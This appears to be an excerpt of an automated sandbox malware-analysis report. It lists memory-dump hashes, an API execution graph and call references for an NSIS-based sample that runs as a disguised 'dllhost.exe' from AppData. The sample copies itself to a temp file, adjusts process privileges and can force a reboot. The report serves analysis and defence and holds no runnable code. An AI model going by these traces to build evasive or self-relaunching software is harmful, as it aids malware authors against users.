                                                                              • Instruction Fuzzy Hash: 1FF06271404344AFEB108E16DCC4B66FFD8EB51724F18C95AED494F286C3799C45CAB1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0ec032cd869656250514e4f28bf0c2c93990553cc0d617c83ee370ab10fb3e27
                                                                              • Instruction ID: 1145993005b6d5826b91b3643d8f38b4da7932bf5a9e28c8cf35e130037bf506
                                                                              • Opcode Fuzzy Hash: 0ec032cd869656250514e4f28bf0c2c93990553cc0d617c83ee370ab10fb3e27
                                                                              • Instruction Fuzzy Hash: BFF0F631A002049FCB40CB98C8456AEFBB6FFC8320B248159D555A7294CB35AC12CB50
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 947727c26622c16adf986b4970d9a437a0101bb11a3d505b8f935ce9e662f23d
                                                                              • Instruction ID: a45f26c250dbec6e4f36986d1a84e1d64e41527fe657e7c399e2c0ded5626a54
                                                                              • Opcode Fuzzy Hash: 947727c26622c16adf986b4970d9a437a0101bb11a3d505b8f935ce9e662f23d
                                                                              • Instruction Fuzzy Hash: 36F09031A00105DFCB14CF98DC849AEF7B2FFC8320B748259E955A76A4CB76AD12CB50
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7972f12b58662f20f0facefdabe9e0e7049c49569640e366d46a7b26fb42a1fc
                                                                              • Instruction ID: 5567095163face2d27284f1e8d310150323c1c69068764ee0c6395be639238b3
                                                                              • Opcode Fuzzy Hash: 7972f12b58662f20f0facefdabe9e0e7049c49569640e366d46a7b26fb42a1fc
                                                                              • Instruction Fuzzy Hash: 8FF0FF31A00115AFCB059B88D9409ADFBB6FF88320F644119E914A3265CB72AD22CB50
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 15f79553d414ec80e5de8e7f6677922c0167b36193d8b817b9aa7ee539c01f89
                                                                              • Instruction ID: e117a7e5e534396c2354634c231021f82979f91b332522a964e6449eeadc9c84
                                                                              • Opcode Fuzzy Hash: 15f79553d414ec80e5de8e7f6677922c0167b36193d8b817b9aa7ee539c01f89
                                                                              • Instruction Fuzzy Hash: 84E01A70E182499F9B40EFA884811ADBFF0AF5A214F6485EAC809D7212E6314612CB91
                                                                              Memory Dump Source

Execution Graph

Execution Coverage: 22.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 1367
Total number of Limit Nodes: 39
EnableMenuItem SendMessageW 3548 404023 SendMessageW 3547->3548 3547->3551 3548->3551 3551->3547 3573 404216 SendMessageW 3551->3573 3574 403ce9 3551->3574 3577 40624c lstrcpynW 3551->3577 3553 404052 lstrlenW 3554 40626e 18 API calls 3553->3554 3555 404068 SetWindowTextW 3554->3555 3578 401389 3555->3578 3557->3514 3558 4040c6 CreateDialogParamW 3557->3558 3558->3514 3559 4040f9 3558->3559 3560 4041e1 19 API calls 3559->3560 3561 404104 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3560->3561 3562 401389 2 API calls 3561->3562 3563 40414a 3562->3563 3563->3513 3564 404152 ShowWindow 3563->3564 3565 40422d SendMessageW 3564->3565 3565->3514 3567 404245 3566->3567 3568 404236 SendMessageW 3566->3568 3567->3535 3568->3567 3570 40626e 18 API calls 3569->3570 3571 4041ec SetDlgItemTextW 3570->3571 3571->3542 3572->3546 3573->3551 3575 40626e 18 API calls 3574->3575 3576 403cf7 SetWindowTextW 3575->3576 3576->3551 3577->3553 3580 401390 3578->3580 3579 4013fe 3579->3535 3580->3579 3581 4013cb MulDiv SendMessageW 3580->3581 3581->3580 3583 401389 2 API calls 3582->3583 3584 401420 3583->3584 3584->3539 3586 4041c1 3585->3586 3587 4041c7 SendMessageW 3585->3587 3586->3587 3587->3534 3589 404260 GetWindowLongW 3588->3589 3599 4042e9 3588->3599 3590 404271 3589->3590 3589->3599 3591 404280 GetSysColor 3590->3591 3592 404283 3590->3592 3591->3592 3593 404293 SetBkMode 3592->3593 3594 404289 SetTextColor 3592->3594 3595 4042b1 3593->3595 3596 4042ab GetSysColor 3593->3596 3594->3593 3597 4042c2 3595->3597 3598 4042b8 SetBkColor 3595->3598 3596->3595 3597->3599 3600 4042d5 DeleteObject 3597->3600 3601 4042dc CreateBrushIndirect 3597->3601 3598->3597 3599->3513 3600->3601 3601->3599 3602 402388 3603 402390 3602->3603 3604 4023bb 3602->3604 3618 402c77 3603->3618 3606 402c37 18 API calls 3604->3606 3608 4023c2 3606->3608 3614 402cf5 3608->3614 3609 4023a1 3611 402c37 18 API calls 3609->3611 3613 4023a8 RegDeleteValueW RegCloseKey 3611->3613 3612 4023cf 3613->3612 3615 
402d0b 3614->3615 3617 402d21 3615->3617 3623 402d2a 3615->3623 3617->3612 3619 402c37 18 API calls 3618->3619 3620 402c8e 3619->3620 3621 4060b9 RegOpenKeyExW 3620->3621 3622 402397 3621->3622 3622->3609 3622->3612 3624 4060b9 RegOpenKeyExW 3623->3624 3625 402d58 3624->3625 3626 402dd0 3625->3626 3627 402d5c 3625->3627 3626->3617 3628 402d7e RegEnumKeyW 3627->3628 3629 402d95 RegCloseKey 3627->3629 3630 402db6 RegCloseKey 3627->3630 3632 402d2a 6 API calls 3627->3632 3628->3627 3628->3629 3631 406626 5 API calls 3629->3631 3630->3626 3633 402da5 3631->3633 3632->3627 3634 402dc4 RegDeleteKeyW 3633->3634 3635 402da9 3633->3635 3634->3626 3635->3626 4488 40190c 4489 401943 4488->4489 4490 402c37 18 API calls 4489->4490 4491 401948 4490->4491 4492 40595a 68 API calls 4491->4492 4493 401951 4492->4493 4501 401d0e 4502 402c15 18 API calls 4501->4502 4503 401d15 4502->4503 4504 402c15 18 API calls 4503->4504 4505 401d21 GetDlgItem 4504->4505 4506 40258c 4505->4506 4507 40190f 4508 402c37 18 API calls 4507->4508 4509 401916 4508->4509 4510 4058ae MessageBoxIndirectW 4509->4510 4511 40191f 4510->4511 4512 401491 4513 4052b0 25 API calls 4512->4513 4514 401498 4513->4514 4515 402592 4516 4025c1 4515->4516 4517 4025a6 4515->4517 4519 4025f5 4516->4519 4520 4025c6 4516->4520 4518 402c15 18 API calls 4517->4518 4525 4025ad 4518->4525 4521 402c37 18 API calls 4519->4521 4522 402c37 18 API calls 4520->4522 4523 4025fc lstrlenW 4521->4523 4524 4025cd WideCharToMultiByte lstrlenA 4522->4524 4523->4525 4524->4525 4526 402629 4525->4526 4527 40263f 4525->4527 4529 405e1f 5 API calls 4525->4529 4526->4527 4528 405df0 WriteFile 4526->4528 4528->4527 4529->4526 4537 403918 4538 403923 4537->4538 4539 403927 4538->4539 4540 40392a GlobalAlloc 4538->4540 4540->4539 3707 401c19 3708 402c15 18 API calls 3707->3708 3709 401c20 3708->3709 3710 402c15 18 API calls 3709->3710 3711 401c2d 3710->3711 3712 401c42 3711->3712 3713 402c37 18 API calls 3711->3713 3714 401c52 3712->3714 3715 402c37 
18 API calls 3712->3715 3713->3712 3716 401ca9 3714->3716 3717 401c5d 3714->3717 3715->3714 3718 402c37 18 API calls 3716->3718 3719 402c15 18 API calls 3717->3719 3720 401cae 3718->3720 3721 401c62 3719->3721 3722 402c37 18 API calls 3720->3722 3723 402c15 18 API calls 3721->3723 3725 401cb7 FindWindowExW 3722->3725 3724 401c6e 3723->3724 3726 401c99 SendMessageW 3724->3726 3727 401c7b SendMessageTimeoutW 3724->3727 3728 401cd9 3725->3728 3726->3728 3727->3728 4541 402a9a SendMessageW 4542 402ab4 InvalidateRect 4541->4542 4543 402abf 4541->4543 4542->4543 4544 40281b 4545 402821 4544->4545 4546 402829 FindClose 4545->4546 4547 402abf 4545->4547 4546->4547 4548 40149e 4549 4022f1 4548->4549 4550 4014ac PostQuitMessage 4548->4550 4550->4549 4551 4029a2 4552 402c15 18 API calls 4551->4552 4553 4029a8 4552->4553 4554 4029e8 4553->4554 4555 4029cf 4553->4555 4557 402885 4553->4557 4558 402a02 4554->4558 4559 4029f2 4554->4559 4556 4029d4 4555->4556 4564 4029e5 4555->4564 4565 40624c lstrcpynW 4556->4565 4561 40626e 18 API calls 4558->4561 4560 402c15 18 API calls 4559->4560 4560->4564 4561->4564 4564->4557 4566 406193 wsprintfW 4564->4566 4565->4557 4566->4557 3474 4015a3 3475 402c37 18 API calls 3474->3475 3476 4015aa SetFileAttributesW 3475->3476 3477 4015bc 3476->3477 4574 405224 4575 405234 4574->4575 4576 405248 4574->4576 4577 40523a 4575->4577 4586 405291 4575->4586 4578 405250 IsWindowVisible 4576->4578 4582 405267 4576->4582 4580 40422d SendMessageW 4577->4580 4581 40525d 4578->4581 4578->4586 4579 405296 CallWindowProcW 4583 405244 4579->4583 4580->4583 4587 404b7a SendMessageW 4581->4587 4582->4579 4592 404bfa 4582->4592 4586->4579 4588 404bd9 SendMessageW 4587->4588 4589 404b9d GetMessagePos ScreenToClient SendMessageW 4587->4589 4590 404bd1 4588->4590 4589->4590 4591 404bd6 4589->4591 4590->4582 4591->4588 4601 40624c lstrcpynW 4592->4601 4594 404c0d 4602 406193 wsprintfW 4594->4602 4596 404c17 4597 40140b 2 API calls 4596->4597 4598 404c20 4597->4598 4603 
40624c lstrcpynW 4598->4603 4600 404c27 4600->4586 4601->4594 4602->4596 4603->4600 4604 4028a7 4605 402c37 18 API calls 4604->4605 4606 4028b5 4605->4606 4607 4028cb 4606->4607 4608 402c37 18 API calls 4606->4608 4609 405d19 2 API calls 4607->4609 4608->4607 4610 4028d1 4609->4610 4632 405d3e GetFileAttributesW CreateFileW 4610->4632 4612 4028de 4613 402981 4612->4613 4614 4028ea GlobalAlloc 4612->4614 4617 402989 DeleteFileW 4613->4617 4618 40299c 4613->4618 4615 402903 4614->4615 4616 402978 CloseHandle 4614->4616 4633 4032f5 SetFilePointer 4615->4633 4616->4613 4617->4618 4620 402909 4621 4032df ReadFile 4620->4621 4622 402912 GlobalAlloc 4621->4622 4623 402922 4622->4623 4624 402956 4622->4624 4626 4030fa 36 API calls 4623->4626 4625 405df0 WriteFile 4624->4625 4627 402962 GlobalFree 4625->4627 4631 40292f 4626->4631 4628 4030fa 36 API calls 4627->4628 4630 402975 4628->4630 4629 40294d GlobalFree 4629->4624 4630->4616 4631->4629 4632->4612 4633->4620 4634 404c2c GetDlgItem GetDlgItem 4635 404c7e 7 API calls 4634->4635 4644 404e97 4634->4644 4636 404d21 DeleteObject 4635->4636 4637 404d14 SendMessageW 4635->4637 4638 404d2a 4636->4638 4637->4636 4639 404d61 4638->4639 4643 40626e 18 API calls 4638->4643 4641 4041e1 19 API calls 4639->4641 4640 404f7b 4642 405027 4640->4642 4646 404e8a 4640->4646 4652 404fd4 SendMessageW 4640->4652 4645 404d75 4641->4645 4647 405031 SendMessageW 4642->4647 4648 405039 4642->4648 4649 404d43 SendMessageW SendMessageW 4643->4649 4644->4640 4650 404b7a 5 API calls 4644->4650 4668 404f08 4644->4668 4651 4041e1 19 API calls 4645->4651 4653 404248 8 API calls 4646->4653 4647->4648 4655 405052 4648->4655 4656 40504b ImageList_Destroy 4648->4656 4663 405062 4648->4663 4649->4638 4650->4668 4669 404d83 4651->4669 4652->4646 4658 404fe9 SendMessageW 4652->4658 4659 40521d 4653->4659 4654 404f6d SendMessageW 4654->4640 4660 40505b GlobalFree 4655->4660 4655->4663 4656->4655 4657 4051d1 4657->4646 4664 4051e3 ShowWindow GetDlgItem 
ShowWindow 4657->4664 4662 404ffc 4658->4662 4660->4663 4661 404e58 GetWindowLongW SetWindowLongW 4665 404e71 4661->4665 4673 40500d SendMessageW 4662->4673 4663->4657 4677 404bfa 4 API calls 4663->4677 4681 40509d 4663->4681 4664->4646 4666 404e77 ShowWindow 4665->4666 4667 404e8f 4665->4667 4685 404216 SendMessageW 4666->4685 4686 404216 SendMessageW 4667->4686 4668->4640 4668->4654 4669->4661 4672 404dd3 SendMessageW 4669->4672 4674 404e52 4669->4674 4675 404e20 SendMessageW 4669->4675 4676 404e0f SendMessageW 4669->4676 4672->4669 4673->4642 4674->4661 4674->4665 4675->4669 4676->4669 4677->4681 4678 4051a7 InvalidateRect 4678->4657 4679 4051bd 4678->4679 4682 404b35 21 API calls 4679->4682 4680 4050cb SendMessageW 4684 4050e1 4680->4684 4681->4680 4681->4684 4682->4657 4683 405155 SendMessageW SendMessageW 4683->4684 4684->4678 4684->4683 4685->4646 4686->4644 4687 40202c 4688 40203e 4687->4688 4698 4020f0 4687->4698 4689 402c37 18 API calls 4688->4689 4690 402045 4689->4690 4692 402c37 18 API calls 4690->4692 4691 401423 25 API calls 4696 40224a 4691->4696 4693 40204e 4692->4693 4694 402064 LoadLibraryExW 4693->4694 4695 402056 GetModuleHandleW 4693->4695 4697 402075 4694->4697 4694->4698 4695->4694 4695->4697 4707 406695 WideCharToMultiByte 4697->4707 4698->4691 4701 402086 4704 401423 25 API calls 4701->4704 4705 402096 4701->4705 4702 4020bf 4703 4052b0 25 API calls 4702->4703 4703->4705 4704->4705 4705->4696 4706 4020e2 FreeLibrary 4705->4706 4706->4696 4708 402080 4707->4708 4709 4066bf GetProcAddress 4707->4709 4708->4701 4708->4702 4709->4708 4710 40432f lstrlenW 4711 404350 WideCharToMultiByte 4710->4711 4712 40434e 4710->4712 4712->4711 4713 402a2f 4714 402c15 18 API calls 4713->4714 4715 402a35 4714->4715 4716 402a6c 4715->4716 4717 402885 4715->4717 4719 402a47 4715->4719 4716->4717 4718 40626e 18 API calls 4716->4718 4718->4717 4719->4717 4721 406193 wsprintfW 4719->4721 4721->4717 4722 401a30 4723 402c37 18 API calls 4722->4723 4724 401a39 
ExpandEnvironmentStringsW 4723->4724 4725 401a4d 4724->4725 4727 401a60 4724->4727 4726 401a52 lstrcmpW 4725->4726 4725->4727 4726->4727 4733 401db3 GetDC 4734 402c15 18 API calls 4733->4734 4735 401dc5 GetDeviceCaps MulDiv ReleaseDC 4734->4735 4736 402c15 18 API calls 4735->4736 4737 401df6 4736->4737 4738 40626e 18 API calls 4737->4738 4739 401e33 CreateFontIndirectW 4738->4739 4740 40258c 4739->4740 4741 401735 4742 402c37 18 API calls 4741->4742 4743 40173c SearchPathW 4742->4743 4744 401757 4743->4744 4745 402835 4746 40283d 4745->4746 4747 402841 FindNextFileW 4746->4747 4750 402853 4746->4750 4748 40289a 4747->4748 4747->4750 4751 40624c lstrcpynW 4748->4751 4751->4750 4752 4014b8 4753 4014be 4752->4753 4754 401389 2 API calls 4753->4754 4755 4014c6 4754->4755 3753 40333d SetErrorMode GetVersion 3754 40337c 3753->3754 3755 403382 3753->3755 3756 406626 5 API calls 3754->3756 3757 4065b6 3 API calls 3755->3757 3756->3755 3758 403398 lstrlenA 3757->3758 3758->3755 3759 4033a8 3758->3759 3760 406626 5 API calls 3759->3760 3761 4033af 3760->3761 3762 406626 5 API calls 3761->3762 3763 4033b6 3762->3763 3764 406626 5 API calls 3763->3764 3765 4033c2 #17 OleInitialize SHGetFileInfoW 3764->3765 3844 40624c lstrcpynW 3765->3844 3768 40340e GetCommandLineW 3845 40624c lstrcpynW 3768->3845 3770 403420 GetModuleHandleW 3771 403438 3770->3771 3772 405b4a CharNextW 3771->3772 3773 403447 CharNextW 3772->3773 3774 403571 GetTempPathW 3773->3774 3784 403460 3773->3784 3846 40330c 3774->3846 3776 403589 3777 4035e3 DeleteFileW 3776->3777 3778 40358d GetWindowsDirectoryW lstrcatW 3776->3778 3856 402ec1 GetTickCount GetModuleFileNameW 3777->3856 3779 40330c 12 API calls 3778->3779 3782 4035a9 3779->3782 3780 405b4a CharNextW 3780->3784 3782->3777 3785 4035ad GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3782->3785 3783 4035f7 3791 405b4a CharNextW 3783->3791 3828 40369a 3783->3828 3839 4036aa 3783->3839 3784->3780 3787 40355c 3784->3787 3789 40355a 
3784->3789 3788 40330c 12 API calls 3785->3788 3940 40624c lstrcpynW 3787->3940 3794 4035db 3788->3794 3789->3774 3795 403616 3791->3795 3794->3777 3794->3839 3802 403674 3795->3802 3803 4036da 3795->3803 3796 4037e4 3799 4037ec GetCurrentProcess OpenProcessToken 3796->3799 3800 403868 ExitProcess 3796->3800 3797 4036c4 3950 4058ae 3797->3950 3805 403804 LookupPrivilegeValueW AdjustTokenPrivileges 3799->3805 3806 403838 3799->3806 3807 405c25 18 API calls 3802->3807 3808 405819 5 API calls 3803->3808 3805->3806 3809 406626 5 API calls 3806->3809 3810 403680 3807->3810 3811 4036df lstrcatW 3808->3811 3812 40383f 3809->3812 3810->3839 3941 40624c lstrcpynW 3810->3941 3814 4036f0 lstrcatW 3811->3814 3815 4036fb lstrcatW lstrcmpiW 3811->3815 3813 403854 ExitWindowsEx 3812->3813 3816 403861 3812->3816 3813->3800 3813->3816 3814->3815 3818 403717 3815->3818 3815->3839 3819 40140b 2 API calls 3816->3819 3821 403723 3818->3821 3822 40371c 3818->3822 3819->3800 3820 40368f 3942 40624c lstrcpynW 3820->3942 3824 4057fc 2 API calls 3821->3824 3823 40577f 4 API calls 3822->3823 3826 403721 3823->3826 3827 403728 SetCurrentDirectoryW 3824->3827 3826->3827 3829 403743 3827->3829 3830 403738 3827->3830 3884 40395a 3828->3884 3955 40624c lstrcpynW 3829->3955 3954 40624c lstrcpynW 3830->3954 3833 40626e 18 API calls 3834 403782 DeleteFileW 3833->3834 3835 40378f CopyFileW 3834->3835 3841 403751 3834->3841 3835->3841 3836 4037d8 3837 406012 37 API calls 3836->3837 3837->3839 3838 406012 37 API calls 3838->3841 3943 403880 3839->3943 3840 40626e 18 API calls 3840->3841 3841->3833 3841->3836 3841->3838 3841->3840 3842 405831 2 API calls 3841->3842 3843 4037c3 CloseHandle 3841->3843 3842->3841 3843->3841 3844->3768 3845->3770 3847 4064e0 5 API calls 3846->3847 3849 403318 3847->3849 3848 403322 3848->3776 3849->3848 3850 405b1d 3 API calls 3849->3850 3851 40332a 3850->3851 3852 4057fc 2 API calls 3851->3852 3853 403330 3852->3853 3854 405d6d 2 API calls 3853->3854 3855 40333b 3854->3855 
3855->3776 3956 405d3e GetFileAttributesW CreateFileW 3856->3956 3858 402f01 3877 402f11 3858->3877 3957 40624c lstrcpynW 3858->3957 3860 402f27 3861 405b69 2 API calls 3860->3861 3862 402f2d 3861->3862 3958 40624c lstrcpynW 3862->3958 3864 402f38 GetFileSize 3865 403034 3864->3865 3883 402f4f 3864->3883 3959 402e5d 3865->3959 3867 40303d 3869 40306d GlobalAlloc 3867->3869 3867->3877 3998 4032f5 SetFilePointer 3867->3998 3970 4032f5 SetFilePointer 3869->3970 3871 4030a0 3874 402e5d 6 API calls 3871->3874 3873 403088 3971 4030fa 3873->3971 3874->3877 3875 403056 3878 4032df ReadFile 3875->3878 3877->3783 3879 403061 3878->3879 3879->3869 3879->3877 3880 402e5d 6 API calls 3880->3883 3881 403094 3881->3877 3881->3881 3882 4030d1 SetFilePointer 3881->3882 3882->3877 3883->3865 3883->3871 3883->3877 3883->3880 3995 4032df 3883->3995 3885 406626 5 API calls 3884->3885 3886 40396e 3885->3886 3887 403974 3886->3887 3888 403986 3886->3888 4016 406193 wsprintfW 3887->4016 3889 40611a 3 API calls 3888->3889 3890 4039b6 3889->3890 3892 4039d5 lstrcatW 3890->3892 3894 40611a 3 API calls 3890->3894 3893 403984 3892->3893 4008 403c30 3893->4008 3894->3892 3897 405c25 18 API calls 3900 403a07 3897->3900 3898 403a9b 3899 405c25 18 API calls 3898->3899 3901 403aa1 3899->3901 3900->3898 3902 40611a 3 API calls 3900->3902 3904 403ab1 LoadImageW 3901->3904 3905 40626e 18 API calls 3901->3905 3903 403a39 3902->3903 3903->3898 3908 403a5a lstrlenW 3903->3908 3911 405b4a CharNextW 3903->3911 3906 403b57 3904->3906 3907 403ad8 RegisterClassW 3904->3907 3905->3904 3910 40140b 2 API calls 3906->3910 3909 403b0e SystemParametersInfoW CreateWindowExW 3907->3909 3939 403b61 3907->3939 3912 403a68 lstrcmpiW 3908->3912 3913 403a8e 3908->3913 3909->3906 3914 403b5d 3910->3914 3915 403a57 3911->3915 3912->3913 3916 403a78 GetFileAttributesW 3912->3916 3917 405b1d 3 API calls 3913->3917 3919 403c30 19 API calls 3914->3919 3914->3939 3915->3908 3918 403a84 3916->3918 3920 403a94 3917->3920 
3918->3913 3921 405b69 2 API calls 3918->3921 3922 403b6e 3919->3922 4017 40624c lstrcpynW 3920->4017 3921->3913 3924 403b7a ShowWindow 3922->3924 3925 403bfd 3922->3925 3927 4065b6 3 API calls 3924->3927 3926 405383 5 API calls 3925->3926 3929 403c03 3926->3929 3928 403b92 3927->3928 3930 403ba0 GetClassInfoW 3928->3930 3933 4065b6 3 API calls 3928->3933 3931 403c07 3929->3931 3932 403c1f 3929->3932 3935 403bb4 GetClassInfoW RegisterClassW 3930->3935 3936 403bca DialogBoxParamW 3930->3936 3938 40140b 2 API calls 3931->3938 3931->3939 3934 40140b 2 API calls 3932->3934 3933->3930 3934->3939 3935->3936 3937 40140b 2 API calls 3936->3937 3937->3939 3938->3939 3939->3839 3940->3789 3941->3820 3942->3828 3944 403898 3943->3944 3945 40388a CloseHandle 3943->3945 4019 4038c5 3944->4019 3945->3944 3948 40595a 68 API calls 3949 4036b3 OleUninitialize 3948->3949 3949->3796 3949->3797 3951 4058c3 3950->3951 3952 4036d2 ExitProcess 3951->3952 3953 4058d7 MessageBoxIndirectW 3951->3953 3953->3952 3954->3829 3955->3841 3956->3858 3957->3860 3958->3864 3960 402e66 3959->3960 3961 402e7e 3959->3961 3962 402e76 3960->3962 3963 402e6f DestroyWindow 3960->3963 3964 402e86 3961->3964 3965 402e8e GetTickCount 3961->3965 3962->3867 3963->3962 3966 406662 2 API calls 3964->3966 3967 402e9c CreateDialogParamW ShowWindow 3965->3967 3968 402ebf 3965->3968 3969 402e8c 3966->3969 3967->3968 3968->3867 3969->3867 3970->3873 3972 403113 3971->3972 3973 40313e 3972->3973 4007 4032f5 SetFilePointer 3972->4007 3975 4032df ReadFile 3973->3975 3976 403149 3975->3976 3977 40315b GetTickCount 3976->3977 3978 40327f 3976->3978 3980 403277 3976->3980 3985 40316e 3977->3985 3979 403283 3978->3979 3984 40329b 3978->3984 3981 4032df ReadFile 3979->3981 3980->3881 3981->3980 3982 4032df ReadFile 3982->3984 3983 4032df ReadFile 3983->3985 3984->3980 3984->3982 3986 4032b6 3984->3986 3985->3980 3985->3983 3989 4031d4 GetTickCount 3985->3989 3999 4067a7 3985->3999 3986->3980 3986->3984 3987 405df0 WriteFile 
3986->3987 3987->3986 3994 4031ed 3989->3994 3990 4031fd MulDiv wsprintfW 3992 4052b0 25 API calls 3990->3992 3991 403269 3991->3980 3992->3994 3993 405df0 WriteFile 3993->3994 3994->3980 3994->3985 3994->3990 3994->3991 3994->3993 3996 405dc1 ReadFile 3995->3996 3997 4032f2 3996->3997 3997->3883 3998->3875 4000 4067cc 3999->4000 4001 4067d4 3999->4001 4000->3985 4001->4000 4002 406864 GlobalAlloc 4001->4002 4003 40685b GlobalFree 4001->4003 4005 4068d2 GlobalFree 4001->4005 4006 4068db GlobalAlloc 4001->4006 4002->4000 4004 406878 4002->4004 4003->4002 4004->4001 4005->4006 4006->4000 4006->4001 4007->3973 4009 403c44 4008->4009 4018 406193 wsprintfW 4009->4018 4011 403cb5 4012 403ce9 19 API calls 4011->4012 4014 403cba 4012->4014 4013 4039e5 4013->3897 4014->4013 4015 40626e 18 API calls 4014->4015 4015->4014 4016->3893 4017->3898 4018->4011 4020 4038d3 4019->4020 4021 4038d8 FreeLibrary GlobalFree 4020->4021 4022 40389d 4020->4022 4021->4021 4021->4022 4022->3948 4763 40483d 4764 40484c 4763->4764 4794 4049eb 4764->4794 4796 405892 GetDlgItemTextW 4764->4796 4766 404248 8 API calls 4768 4049ff 4766->4768 4767 40486c 4769 405c25 18 API calls 4767->4769 4770 404872 4769->4770 4797 40624c lstrcpynW 4770->4797 4772 404889 4773 406626 5 API calls 4772->4773 4778 404890 4773->4778 4774 4048d1 4798 40624c lstrcpynW 4774->4798 4776 4048d8 4777 405bc8 4 API calls 4776->4777 4779 4048de GetDiskFreeSpaceW 4777->4779 4778->4774 4782 405b69 2 API calls 4778->4782 4783 404929 4778->4783 4781 404902 MulDiv 4779->4781 4779->4783 4781->4783 4782->4778 4784 40499a 4783->4784 4785 404b35 21 API calls 4783->4785 4786 4049bd 4784->4786 4788 40140b 2 API calls 4784->4788 4787 404987 4785->4787 4799 404203 KiUserCallbackDispatcher 4786->4799 4789 40499c SetDlgItemTextW 4787->4789 4790 40498c 4787->4790 4788->4786 4789->4784 4792 404a6c 21 API calls 4790->4792 4792->4784 4793 4049d9 4793->4794 4795 404609 SendMessageW 4793->4795 4794->4766 4795->4794 4796->4767 4797->4772 4798->4776 
4799->4793

                                                                              Control-flow Graph
                                                                              (nodes marked Executed / Not Executed in the original)
                                                                              [Control-flow graph of function 0040333D (basic blocks and edges), rendered as an interactive graph in the original report; not reproduced here. It starts at 0040333D (SetErrorMode, GetVersion), loads UXTHEME, runs the temp-directory setup (GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW for TEMP and TMP), builds the ~nsu…tmp self-copy (lstrcatW, DeleteFileW, CopyFileW), optionally takes the SeShutdownPrivilege / ExitWindowsEx reboot path, and ends in ExitProcess.]
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE ref: 00403360
                                                                              • GetVersion.KERNEL32 ref: 00403366
                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
                                                                              • OleInitialize.OLE32(00000000), ref: 004033DD
                                                                              • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
                                                                              • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
                                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,?,00000006,00000008,0000000A), ref: 00403421
                                                                              • CharNextW.USER32(00000000), ref: 00403448
                                                                                • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                                • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403582
                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403593
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040359F
                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 004035B3
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035BB
                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CC
                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D4
                                                                              • DeleteFileW.KERNEL32(1033,?,00000006,00000008,0000000A), ref: 004035E8
                                                                                • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
                                                                              • ExitProcess.KERNEL32 ref: 004036D4
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 004036E7
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 004036F6
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
